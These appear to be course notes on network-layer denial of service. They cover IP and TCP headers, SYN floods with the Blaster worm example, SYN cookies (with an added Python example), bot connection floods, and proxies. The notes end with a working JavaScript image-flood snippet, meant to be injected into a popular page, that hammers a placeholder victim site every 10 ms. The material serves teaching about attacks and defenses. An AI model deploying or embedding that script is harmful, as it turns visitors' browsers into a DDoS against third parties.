IP header format
-connectionless
-unreliable
-best effort
version, header length, type of service, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source address of originating host, destination address of target host, options, padding, ip data
TCP
-session based, congestion control, in order delivery
source port, dest port, seq number, ack number, flags (urg, ack, psh, rst, syn, fin), other stuff
TCP handshake
syn: SNc <- randc, ANc <- 0
SYN flood
-SYN packets with random (spoofed) source IP addresses
-each half-open connection fills a backlog queue entry on the server
-once the backlog is full, no further connections possible
A classic SYN flood example: MS Blaster worm (2003)
- SYN flood on port 80 to windowsupdate.com
-50 SYN packets every second, each packet is 40 bytes
-spoofed source IP: a.b.X.Y where X, Y random
Low rate SYN flood defenses
Non-solution
-increase backlog queue size or decrease timeout
Correct solution
- SYN cookies: remove state from server
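The SYN cookie defence above, as an added example that is not code from these notes: the server answers every SYN with a SYN-ACK whose sequence number is a keyed MAC over the connection, and only allocates state when a returning ACK proves the source address was real. SECRET, MSS_TABLE, make_cookie and check_ack are names chosen for this example.

```python
import hashlib
import hmac

# Added example, not code from the notes: a simplified SYN cookie, the
# "remove state from server" defence. The server's ISN (SNs) in the SYN-ACK
# is a MAC over the 4-tuple, the client's SN and a coarse time counter, so
# no backlog entry exists until the client's ACK proves the SYN was genuine.
SECRET = b"rotate-this-server-secret"   # assumption: known only to the server
MSS_TABLE = [536, 1220, 1440, 1460]      # MSS choice encoded in the cookie's low 2 bits


def _mac(src_ip, src_port, dst_ip, dst_port, client_seq, counter):
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{client_seq}|{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big") & 0x01FFFFFF   # 25-bit tag


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_seq, mss_index, counter):
    """SNs for the SYN-ACK. counter is a coarse clock, e.g. int(time.time()) // 64."""
    mac = _mac(src_ip, src_port, dst_ip, dst_port, client_seq, counter)
    return ((counter & 0x1F) << 27) | (mac << 2) | (mss_index & 0x3)


def check_ack(src_ip, src_port, dst_ip, dst_port, seq, ack, counter):
    """Validate the handshake's third packet; returns the negotiated MSS or None.
    The client echoes seq = SNc+1 and ack = SNs+1, so the cookie is ack-1."""
    cookie = (ack - 1) & 0xFFFFFFFF
    client_seq = (seq - 1) & 0xFFFFFFFF
    got = ((cookie >> 2) & 0x01FFFFFF).to_bytes(4, "big")
    for cand in (counter, counter - 1):          # current epoch or the one before
        if (cand & 0x1F) != (cookie >> 27):
            continue
        want = _mac(src_ip, src_port, dst_ip, dst_port, client_seq, cand).to_bytes(4, "big")
        if hmac.compare_digest(want, got):
            return MSS_TABLE[cookie & 0x3]
    return None


def demo(counter=1000):
    """Constructed handshake: a spoofed-source SYN never produces a valid ACK,
    so it costs the server nothing; a real client is admitted from the cookie."""
    c, s, snc = ("10.0.0.7", 40000), ("192.0.2.10", 80), 0x1234ABCD
    sns = make_cookie(*c, *s, snc, 3, counter)
    genuine = check_ack(*c, *s, snc + 1, sns + 1, counter)
    forged = check_ack("10.0.0.8", c[1], *s, snc + 1, sns + 1, counter)   # same cookie, other source
    return genuine, forged
```

The cookie only carries a 2-bit MSS index and a 5-bit clock, which is the usual price of statelessness: TCP options negotiated in the SYN are lost, which is why real stacks enable cookies only once the backlog is under pressure.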
Massive flood
-command bot army to flood specific target
-20,000 bots can generate 2Gb/sec of SYNs
-at web site: saturates network uplink or network router
-random source IP -> attack SYNs look the same as real SYNs
Idea: only forward established TCP connections to site (SYN flood protection proxy)
Stronger attacks: TCP connection flood
Command bot army
-complete TCP connection to web site
-send short HTTP HEAD request
-repeat
Bypasses the SYN flood protection proxy, but:
-attacker can no longer use random source IPs
-reveals location of bot zombies
-proxy can now block or rate-limit bots
Javascript-based DDoS:
github.com <- honest end user <- inject imageFlood.js <- popular server
imageFlood.js
  function imgflood() {
    var TARGET = 'victim-website.com/index.php?';
    var rand = Math.floor(Math.random() * 1000);
    var pic = new Image();
    pic.src = 'http://' + TARGET + rand + '=val';  // random query string defeats the browser cache
  }
  setInterval(imgflood, 10);  // one request every 10 ms for as long as the page stays open